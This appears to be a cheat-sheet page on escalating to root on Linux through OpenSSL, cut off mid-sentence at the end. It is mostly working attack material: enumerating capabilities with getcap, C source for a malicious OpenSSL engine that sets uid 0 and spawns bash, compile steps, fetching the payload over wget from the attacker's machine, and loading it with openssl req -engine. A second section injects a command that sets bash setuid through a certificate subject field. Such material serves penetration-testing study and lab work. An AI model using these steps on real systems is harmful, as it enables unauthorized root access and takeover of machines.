Reference:
Chack capabilities in the target machine.
Copy # -r: recursive
getcap -r / 2>/dev/null
Copied! If you see the openssl has the capability set as below, you can successfully exploit it.
Copy /usr/bin/openssl = cap_setuid+ep
Copied!
In local machine, you need to have “libssl-dev” to use the header file named “openssl/engine.h” in the exploit.
If you don't have it yet, install it.
Copy sudo apt install libssl-dev
Copied! Then create "exploit.c".
Copy #include <openssl/engine.h>
static int bind(ENGINE *e, const char *id) {
setuid(0); setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
Copied! Now compile it using gcc.
Copy # -fPIC: for generating a shared object (PIC: Position Independent Code)
# -c: compile and assemble, but do not link.
gcc -fPIC -o exploit.o -c exploit.c
# -shared: create a shared library.
gcc -shared -o exploit.so -lcrypto exploit.o
Copied! Transfer the "exploit.so" to the target machine.
Copy wget http://<local-ip>:8000/exploit.so
Copied! Run the exploit and finally you should get the root shell.
Copy # req: PKCS#10 X.509 Certificate Signing Request (CSR) Management.
# engine: Engine (loadable module) information and manipulation.
openssl req -engine ./exploit.so
Copied!
Copy openssl x509 -in /opt/example.crt -noout -subject
Copied! If the above command is executed by root and use values of subjects in any way, we might be able to execute arbitrary command as root.
For example, create a certificate that contains the malicious subject value.
When the prompt asks us to enter values, we can insert arbitrary command.
Copy openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /opt/example.key -out /opt/example.crt -days 1
...
Common Name (e.g. server FQDN or YOUR name) []:$(chmod u+s /bin/bash)
...
Copied! Then some shell script, that uses the subject values, is executed as root, our command ($(chmod u+s /bin/bash)
